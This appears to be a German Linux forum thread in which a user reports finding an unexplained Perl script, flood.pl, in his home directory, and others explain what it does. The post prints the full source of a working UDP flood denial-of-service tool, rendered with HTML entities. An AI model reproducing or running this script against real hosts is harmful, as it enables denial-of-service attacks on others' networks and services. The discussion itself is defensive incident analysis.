merkwürdiges Script im Home-Verzeichnis

Post Reply
Message
Author
micbur
Posts: 86
Joined: 05. Jun 2004 15:55

merkwürdiges Script im Home-Verzeichnis

#1 Post by micbur »

Hallo,

ich sichere meinen Rechner immer, wenn ich den Platz verlasse, sodass ich mich abmelden muss. Nun gibt es in meinem Homeverzeichnis eine Datei namens flood.pl und mit ausführbaren Rechten für 'world' und mit meiner Nutzer-ID und -Gruppe.

Kann mir einer erklären, was jemand davon hat, wenn er auf meinem Rechner dieses Scipt ausführt? Ich kann kein Perl.

[edit: ich habe das nicht da hin gepackt, das weiß ich genau, weil: ich kann kein Perl und habe auch nach keinem Script gesucht oder so]

Code: Select all

#!/usr/bin/perl
################################################## ###
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
################################################## ####

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit&#40;1&#41;;
&#125;

my &#40;$ip,$port,$size,$time&#41;;
$ip=$ARGV&#91;0&#93;;
$port=$ARGV&#91;1&#93;;
$time=$ARGV&#91;2&#93;;

socket&#40;crazy, PF_INET, SOCK_DGRAM, 17&#41;;
$iaddr = inet_aton&#40;"$ip"&#41;;

printf "udp flood - odix\n";

if &#40;$ARGV&#91;1&#93; ==0 && $ARGV&#91;2&#93; ==0&#41; &#123;
goto randpackets;
&#125;
if &#40;$ARGV&#91;1&#93; !=0 && $ARGV&#91;2&#93; !=0&#41; &#123;
system&#40;"&#40;sleep $time;killall -9 udp&#41; &"&#41;;
goto packets;
&#125;
if &#40;$ARGV&#91;1&#93; !=0 && $ARGV&#91;2&#93; ==0&#41; &#123;
goto packets;
&#125;
if &#40;$ARGV&#91;1&#93; ==0 && $ARGV&#91;2&#93; !=0&#41; &#123;
system&#40;"&#40;sleep $time;killall -9 udp&#41; &"&#41;;
goto randpackets;
&#125;

packets&#58;
for &#40;;;&#41; &#123;
$size=$rand x $rand x $rand;
send&#40;crazy, 0, $size, sockaddr_in&#40;$port, $iaddr&#41;&#41;;
&#125;

randpackets&#58;
for &#40;;;&#41; &#123;
$size=$rand x $rand x $rand;
$port=int&#40;rand 65000&#41; +1;
send&#40;crazy, 0, $size, sockaddr_in&#40;$port, $iaddr&#41;&#41;;
&#125;
Ciao, micbur
Top
User avatar
Janka
Posts: 3585
Joined: 11. Feb 2006 19:10

#2 Post by Janka »

Das was oben drin steht. UDP-Pakete an eine bestimmte IP, beginnend mit einem bestimmten Startport schicken. Bringt NFS, SMB (nicht CIFS), VPNs und einige andere Dienste durcheinander.

Deshalb wird in einem gut gewarteten Netzwerk den normalen Benutzern auch verboten, UDP-Pakete zu verschicken.

Janka
Ich vertonne Spam immer in /dev/dsp statt /dev/null.
Ich mag die Schreie.
Top
micbur
Posts: 86
Joined: 05. Jun 2004 15:55

#3 Post by micbur »

Also löschen.

Habe ich noch ein Chance herauszubekommen, wen es getroffen hat?

Ciao, micbur
Top
User avatar
Janka
Posts: 3585
Joined: 11. Feb 2006 19:10

#4 Post by Janka »

micbur wrote:Habe ich noch ein Chance herauszubekommen, wen es getroffen hat?
Kommt auf die Logeinstellungen deines Paketfilters an. Normalerweise werden ausgehende Pakete aber nicht geloggt, weil das das Logfile zumüllen würde.

Janka
Ich vertonne Spam immer in /dev/dsp statt /dev/null.
Ich mag die Schreie.
Top
Post Reply

Return to “Sicherheit”